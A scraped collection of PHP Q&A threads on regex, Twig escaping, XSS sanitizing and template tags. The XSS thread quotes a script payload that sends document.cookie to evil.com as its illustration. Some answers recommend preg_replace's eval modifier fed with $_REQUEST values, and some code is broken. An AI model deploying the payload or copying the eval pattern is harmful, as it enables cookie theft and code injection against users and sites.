PHP Regular Expression - Single Quote not working - TWIG pre-escaping - php

I got a problem with single quotes in a regular expression.
What i want to do is replace smileys in a string to a html image tag.
All smileys are working, except the sad smiley :'-( because it has a single quote in it.
Magic Quotes is turned off (testet with if (g!et_magic_quotes_gpc()) dd('mq off');).
So, let me show you some code.
protected $emoticons = array(
// ...
'cry' => array(
'image' => '<img class="smiley" src="/image/emoticon/cry.gif" />',
'emoticons' => array(":'(", ";'(", ":'-(", ";'-(")
),
);
My method to replace all the emoticons is the following:
public function replaceEmoticons($input) {
$output = $input;
foreach ($this->emoticons as $emo_group_name => $emo_group) {
$regex_emo_part = array();
foreach ($emo_group['emoticons'] as $emoticon) {
$regex_emo_part[] = preg_quote($emoticon, '#');
}
$regex_emo_part = implode('|', $regex_emo_part);
$regex = '#(?!<\w)(' . $regex_emo_part .')(?!\w)#';
$output = preg_replace($regex, $emo_group['image'], $output);
}
return $output;
}
But as i said: ' kills it. No replacement there. :-) :-/ and so on are working. Why?
FYI Content of $regex: #(?!<\w)(\:\'\(|;\'\(|\:\'\-\(|;\'\-\()(?!\w)#
What is wrong here, can you help me?
UPDATE:
Thanks # cheery and cychoi. The replacing method is okay, you've got right.
I found the problem. My string gets escaped before it is forwarded to the replaceEmoticons method. I use TWIG templating engine and i use |nl2br filter before my selfmade replace_emoticon filter.
Let me show you. This is the output in the final template. It is a template to show a comment for an blog entry:
{{ comment.content|nl2br|replace_emoticons|raw }}
Problem: nl2br is auto pre-escaping the input string, so ' gets replaced by the escaped one '
I need this nl2br to show linebreakes as <br /> - and i need the escaping too, to disallow html tags in the user's input.
I need replace_emoticons to replace my emoticons (selfmade TWIG extension).
And i need raw here at the end of the filter chain too, otherwise all HTML smiley img tags gets escaped and i will see raw html in the comment's text.
What can i do here? The only problem here seems to be that nl2br escapes ' too. This is no bad idea but in my case it will destroy all sad smileyss containing ' in it.
Still searching for a solution to solve this and i hope you can help me.
Best,
titan

I added an optional parameter to the emoticon method:
public function replaceEmoticons($input, $use_emo_encoding_for_regex = true) {
and i changed the foreach part a lil' bit:
foreach ($emo_group['emoticons'] as $emoticon) {
if ($use_emo_encoding_for_regex === true) {
$emoticon = htmlspecialchars($emoticon, ENT_QUOTES);
}
$regex_emo_part[] = preg_quote($emoticon, '#');
}
It works! All emoticons are replaced!

Related

Sanitizing Output To Textarea From XSS

What are the best methods of sanitizing values from a database (in php) if they are to be used in inputs like textareas?
For example, when inserting data, I can strip tags and quotes and replace them with html char codes and then use mysql_real_escape_string right before insertion.
When retrieving that data back, I need it to show up in a textarea. How can I do this and still avoid XSS? (Ex. you could easily type in
</textarea><script type='text/javascript'> Malicious Code</script><textarea>
) and cause problems.
Thanks!
I think i would prefer a combo of filter_var and url_decode if you want to use a pure simple php Solution
Reason
Imagine an impute like this
$maliciousCode = "<script>document.write(\"<img src='http://evil.com/?cookies='\"+document.cookie+\"' style='display:none;' />\");</script> I love PHP";
If i use strip_tags
var_dump(strip_tags($maliciousCode));
Output
string 'document.write("' (length=16)
if i use htmlspecialchars
var_dump(htmlspecialchars($maliciousCode));
Output
string '<script>document.write("<img src='http://evil.com/?cookies='"+document.cookie+"' style='display:none;' />");</script> I love PHP' (length=166)
My Choice
function cleanData($str) {
$str = urldecode ($str );
$str = filter_var($str, FILTER_SANITIZE_STRING);
$str = filter_var($str, FILTER_SANITIZE_SPECIAL_CHARS);
return $str ;
}
$input = cleanData ( $maliciousCode );
var_dump($input);
Output
string 'document.write(&#34;&#34;); I love PHP' (length=46)
If form is using GET instead of POST some can till escape if it is url encoded , you are able to get a minimal information and make sure the final text is harmless
The are also enough class online to help you do filter see
http://www.phpclasses.org/package/2189-PHP-Filter-out-unwanted-PHP-Javascript-HTML-tags-.html
http://htmlpurifier.org/
HTMLpurifier is a great tool for cleaning out unwanted HTML, particularly unwanted JavaScript. Also using htmlspecialchars() is recommended for outputting user-provided content.
After getting a dirty spammer on my contact form I expanded my function that sanitizes textbox user input.It now also covers multi-line textarea input
I needed to format for normal display and also html email from my contact page.
It also gives option to format for a plain text email which I also use.
function clean_text($text, $html = true)
{ if($text == ""){return "";}
$text = nl2br($text,false); // false gives <br>, true gives <br />
$textary = explode("<br>",$text);
foreach($textary as $key => $val)
{ $val = trim($val);
$val = stripslashes($val);
$val = htmlspecialchars($val);
$textary[$key] = $val;
}
if ($html)
{ return implode("<br />",$textary);} //return implode("<br>",$textary);
else
{ return implode("\r\n",$textary);}
}
By the way... Thanks SO members for being part of my learning PHP.
Example at http://www.microcal.ca/scripts/cleantext.php

PHP - Display Tags Within Tag as Text

Sorry for not being able to make the title clearer.
Basically I can type text onto my page, where all HTML-TAGS are stripped, except from a couple which I've allowed.
What I want though is to be able to type all the tags I want, to be displayed as plain text, but only if they're within 'code' tags. I'm aware I'll probably use htmlentities, but how can I do it to only affect tags within the 'code' tag?
Can it be done?
Thanks in advance guys.
For example I have $_POST['content'] which is what's shown on the web page. And is the variable with all the output I'm having problems with.
Say I post a paragraph of text, it will be echoed out with all tags stripped except for a few, including the 'code' tag.
Within the code tag I put code, such as HTML information, but this should be displayed as text. How can I escape the HTML tags to be displayed as plain text within the 'code' tag only?
Below is an example of what I may type:
Hi there, this is some text and this is a picture <img ... />.
Below I will show you the code how to do this image:
<code>
<img src="" />
</code>
Everything within the tags should be displayed as plain text so that they won't get removed from PHP's strip_tags, but only html tags within the tags.
If it's STRICTLY code tags, then it can be done quite easily.
First, explode your string by any occurences of '' or ''.
For example, the string:
Hello <code> World </code>
Should become a 4-item array: {Hello,,World!,}
Now loop through the array starting at 0 and incrementing by 4. Each element you hit, run your current script on (to remove all but the allowed tags).
Now loop through the array starting at 2 and incrementing by 4. Each element you hit, just run htmlspecialentities on it.
Implode your array, and now you have a string where anything inside the tags is completely sanitized and anything outside the tags is partially sanitized.
This is the solution I found which works perfectly for me.
Thanks everyone for their help!
function code_entities($matches) {
return str_replace($matches[1],htmlentities($matches[1]),$matches[0]);
}
$content = preg_replace_callback('/<code.*?>(.*?)<\/code>/imsu',code_entities, $_POST['content']);
Here is some sample code that should do the trick:
$parsethis = '';
$parsethis .= "Hi there, this is some text and this is a picture <img src='http://www.google.no/images/srpr/logo3w.png' />\n";
$parsethis .= "Below I will show you the code how to do this image:\n";
$parsethis .= "\n";
$parsethis .= "<code>\n";
$parsethis .= " <img src='http://www.google.no/images/srpr/logo3w.png' />\n";
$parsethis .= "</code>\n";
$pattern = '#(<code[^>]*>(.*?)</code>)#si';
$finalstring = preg_replace_callback($pattern, "handle_code_tag", $parsethis);
echo $finalstring;
function handle_code_tag($matches) {
$ret = '<pre>';
$ret .= str_replace(array('<', '>'), array('<', '>'), $matches[2]);
$ret .= '</pre>';
return $ret;
}
What it does:
First using preg_replace_callback I match all code inside <code></code sending it to my callback function handle_code_tagwhich escapes all less-than and greater-than tags inside the content. The matches array wil contain full matched string in 1 and the match for (.*?) in [2].#si` s means match . across linebrakes and i means caseinsensitive
The rendered output looks like this in my browser:

Replacing words with tag links in PHP

I have a text ($text) and an array of words ($tags). These words in the text should be replaced with links to other pages so they don't break the existing links in the text. In CakePHP there is a method in TextHelper for doing this but it is corrupted and it breaks the existing HTML links in the text. The method suppose to work like this:
$text=Text->highlight($text,$tags,'\1',1);
Below there is existing code in CakePHP TextHelper:
function highlight($text, $phrase, $highlighter = '<span class="highlight">\1</span>', $considerHtml = false) {
if (empty($phrase)) {
return $text;
}
if (is_array($phrase)) {
$replace = array();
$with = array();
foreach ($phrase as $key => $value) {
$key = $value;
$value = $highlighter;
$key = '(' . $key . ')';
if ($considerHtml) {
$key = '(?![^<]+>)' . $key . '(?![^<]+>)';
}
$replace[] = '|' . $key . '|ix';
$with[] = empty($value) ? $highlighter : $value;
}
return preg_replace($replace, $with, $text);
} else {
$phrase = '(' . $phrase . ')';
if ($considerHtml) {
$phrase = '(?![^<]+>)' . $phrase . '(?![^<]+>)';
}
return preg_replace('|'.$phrase.'|i', $highlighter, $text);
}
}
You can see (and run) this algorithm here:
http://www.exorithm.com/algorithm/view/highlight
It can be made a little better and simpler with a few changes, but it still isn't perfect. Though less efficient, I'd recommend one of Ben Doom's solutions.
Replacing text in HTML is fundamentally different than replacing plain text. To determine whether text is part of an HTML tag requires you to find all the tags in order not to consider them. Regex is not really the tool for this.
I would attempt one of the following solutions:
Find the positions of all the words. Working from last to first, determine if each is part of a tag. If not, add the anchor.
Split the string into blocks. Each block is either a tag or plain text. Run your replacement(s) on the plain text blocks, and re-assemble.
I think the first one is probably a bit more efficient, but more prone to programmer error, so I'll leave it up to you.
If you want to know why I'm not approaching this problem directly, look at all the questions on the site about regex and HTML, and how regex is not a parser.
This code works just fine. What you may need to do is check the CSS for the <span class="highlight"> and make sure it is set to some color that will allow you to distinguish that it is high lighted.
.highlight { background-color: #FFE900; }
Amorphous - I noticed Gert edited your post. Are the two code fragments exactly as you posted them?
So even though the original code was designed for highlighting, I understand you're trying to repurpose it for generating links - it should, and does work fine for that (tested as posted).
HOWEVER escaping in the first code fragment could be an issue.
$text=Text->highlight($text,$tags,'\1',1);
Works fine... but if you use speach marks rather than quote marks the backslashes disappear as escape marks - you need to escape them. If you don't you get %01 links.
The correct way with speach marks is:
$text=Text->highlight($text,$tags,"\\1",1);
(Notice the use of \1 instead of \1)

Need to extract special tags and replace them based upon their contents using regular expression

I'm working on a simple templating system. Basically I'm setting it up such that a user would enter text populated with special tags of the form: <== variableName ==>
When the system would display the text it would search for all tags of the form mentioned and replace the variableName with its corresponding value from a database result.
I think this would require a regular expression but I'm really messed up in REGEX here. I'm using php btw.
Thanks for the help guys.
A rather quick and dirty hack here:
<?php
$teststring = "Hello <== tag ==>";
$values = array();
$values['tag'] = "world";
function replaceTag($name)
{
global $values;
return $values[$name];
}
echo preg_replace('/<== ([a-z]*) ==>/e','replaceTag(\'$1\')',$teststring);
Output:
Hello world
Simply place your 'variables' in the variable array and they will be replaced.
The e modifier to the regular expression tells it to eval the replacement, the [a-z] lets you name the "variables" using the characters a-z (you could use [a-z0-9] if you wanted to include numbers). Other than that its pretty much standard PHP.
Very useful - Pointed me to what I was looking for...
Replacing tags in a template e.g.
<<page_title>>, <<meta_description>>
with corresponding request variables e,g,
$_REQUEST['page_title'], $_REQUEST['meta_description'],
using a modified version of the code posted:
$html_output=preg_replace('/<<(\w+)>>/e', '$_REQUEST[\'$1\']', $template);
Easy to change this to replace template tags with values from a DB etc...
If you are doing a simple replace, then you don't need to use a regexp. You can just use str_replace() which is quicker.
(I'm assuming your '<== ' and ' ==>' are delimiting your template var and are replaced with your value?)
$subject = str_replace('<== '.$varName.' ==>', $varValue, $subject);
And to cycle through all your template vars...
$tplVars = array();
$tplVars['ONE'] = 'This is One';
$tplVars['TWO'] = 'This is Two';
// etc.
// $subject is your original document
foreach ($tplVars as $varName => $varValue) {
$subject = str_replace('<== '.$varName.' ==>', $varValue, $subject);
}

preg_replace() str_replace() apostrophe nightmare! - Drupal menu image replace

Can anyone help me decode why this doesnt work?
$cssid = preg_replace("/'/", "", $cssid);
Trying to strip the single quote marks from some html...
Thanks!
H
EDIT
This is the full function - it's designed to rebuild the Drupal menu using images, and it applies CSS classes to each item, allowing you to select the image you want. Stripping out spaces and apostrophes needs to be done or the CSS selector fails.
The title of the menu item causing all this problem is:
What's new
Pretty innocuous you'd think. (Except for that single ')
function primary_links_add_icons() {
$links = menu_primary_links();
$level_tmp = explode('-', key($links));
$level = $level_tmp[0];
$output = "<ul class=\"links-$level\">\n";
if ($links) {
foreach ($links as $link) {
$link = l($link['title'], $link['href'], $link['attributes'], $link['query'], $link['fragment']);
$cssid = str_replace(' ', '_', strip_tags($link));
$cssid = str_replace('\'', '', $cssid);
/*$link = preg_replace('#(<a.*?>).*?(</a>)#', '$1$2', $link);*/
$output .= '<li id="'.$cssid.'">' . $link .'</li>';
};
$output .= '</ul>';
}
return $output;
}
EDIT the saga continues...
I notice that I get the following error in PHPMYADMIN:
The mbstring PHP extension was not
found and you seem to be using a
multibyte charset. Without the
mbstring extension phpMyAdmin is
unable to split strings correctly and
it may result in unexpected results.
I wonder whether this has something to do with it?
In any case the the SQL code is:
('primary-links', 951, 0, 'http://www.google.com', '', 'What''s New',
And this displays in FireBug once it's been rendered as:
<li id="What's_New">
I've created a menu item called "What#s New" and the str_replace() will work on that just fine, so it's ALL about this goddam apostrophe. I think I agree, the expression works, but it has to be an encoding problem. It really is a proper, common, apostrophe and not one of the variants, but for some reason PHP is absolutely unable to recognise it as such.
EDIT oh god oh god - it's Drupal again...
It appears that the function l() which formats all the links is completely impervious to having it's output rewritten?! Whatever the case, this code works...
function primary_links_add_icons() {
$links = menu_primary_links();
$level_tmp = explode('-', key($links));
$level = $level_tmp[0];
$output = "<ul class=\"links-$level\">\n";
if ($links) {
foreach ($links as $link) {
$link['title'] = str_replace('\'', '', $link['title']);
$link = l($link['title'], $link['href'], $link['attributes'], $link['query'], $link['fragment']);
$cssid = str_replace(' ', '_', strip_tags($link));
/*$link = preg_replace('#(<a.*?>).*?(</a>)#', '$1$2', $link);*/
$output .= '<li id="'.$cssid.'">' . $link .'</li>';
};
$output .= '</ul>';
}
return $output;
}
2 hours later and I can carry on theming this site...
Thank you so much for all your suggestions, I'm going to point the drupal snippet authors at this post so hopefully other people will benefit from it too.
CSS image replacement is a much more commonly chosen way for menu item replacing:
First install: Menu Attributes module to be able to assing css id's for every menu item. (these attributes can be set from the menu item edit page on admin panel)
Then use css image replacement. Here is a good tutorial for this.
And this is the method i use for my sites:
#primary-tv
{
display: block;
width: 90px;
height: 0px;
padding-top: 41px;
background: url(images/nghtv.png);
}
This is an example for replacement with an image of 90 x 41px
And for the apostrophe replacement:
$cssid = preg_replace("'","",htmlspecialchars($cssid, ENT_QUOTES));
escape the single quote.
Your code looks fine. But why don’t you use str_replace as you’re replacing a fixed string?
$cssid = str_replace("'", "", $cssid);
If str_replace("'","") doesn't work, are you sure the characters you want to remove are indeed normal apostrophes (') instead of weird alternatives (’), or some weird accent marks (´`˙ ̛̉῾᾿) or single quotes (‘’) or whatnot?
Or maybe the value of $cssid gets replaced back to original by some other bug?
Maybe you're looking at the wrong output for results?
Or by a far chance, are you accidentally running a different copy of the code than the one you are editing - btw, that's really annoying when it happens! :)
Given that it is HTML have you considered that it may be represented as &#39 rather than '?

Categories